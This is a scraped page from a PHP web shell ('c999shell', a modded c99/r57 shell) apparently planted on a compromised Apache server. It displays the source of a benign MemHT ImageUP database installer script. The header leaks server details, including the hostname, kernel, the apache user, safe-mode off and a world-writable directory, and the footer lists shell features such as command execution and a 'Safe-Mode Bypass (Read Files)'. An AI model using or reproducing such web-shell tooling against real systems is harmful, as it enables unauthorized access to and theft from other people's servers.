Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/alumni/ drwxrwxrwx |
Viewing file: Select action/file-type: (GPLv2) or write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA02110-1301, USA. ********************************************************************************/ //====================================================================== // MySQL Database Installer: MemHT ImageUP 3.6 //====================================================================== $sqlfile = "imageup.sql"; //====================================================================== //=========================================== //Database: Connect //=========================================== require_once("inc/inc_config.php"); require_once("inc/inc_database.php"); $dblink = new database(); $dblink->connect(); require_once("inc/inc_functions.php"); require_once("inc/inc_login.php"); if (isAdmin($admin)) { if (file_exists($sqlfile)) { parse_mysql_dump($sqlfile); echo "Finished!"; } else { $row = mysql_fetch_assoc(mysql_query("SELECT site_url FROM memht_config")); $site_url = outCode($row['site_url']); die("Attention! The installation MySQL dump file does not exist The path should be: $site_url/$sqlfile"); } } else { die("Access Denied! You must be logged as administrator to execute this file"); } //=========================================== //Database: Disconnect //=========================================== $dblink->disconnect(); //================================================== function parse_mysql_dump($filename){ global $success; $templine = ''; // Read in entire file $lines = file($filename); // Loop through each line foreach ($lines as $line_num => $line) { // Only continue if it's not a comment if (substr($line, 0, 2) != '--' && $line != '') { // Add this line to the current segment $templine .= $line; // If it has a semicolon at the end, it's the end of the query if (substr(trim($line), -1, 1) == ';') { // Perform the query if (!mysql_query($templine)) { $success = false; echo "Error performing query ".$templine.":".mysql_error()." "; } // Reset temp variable to empty $templine = ''; } } } } ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0053 ]-- |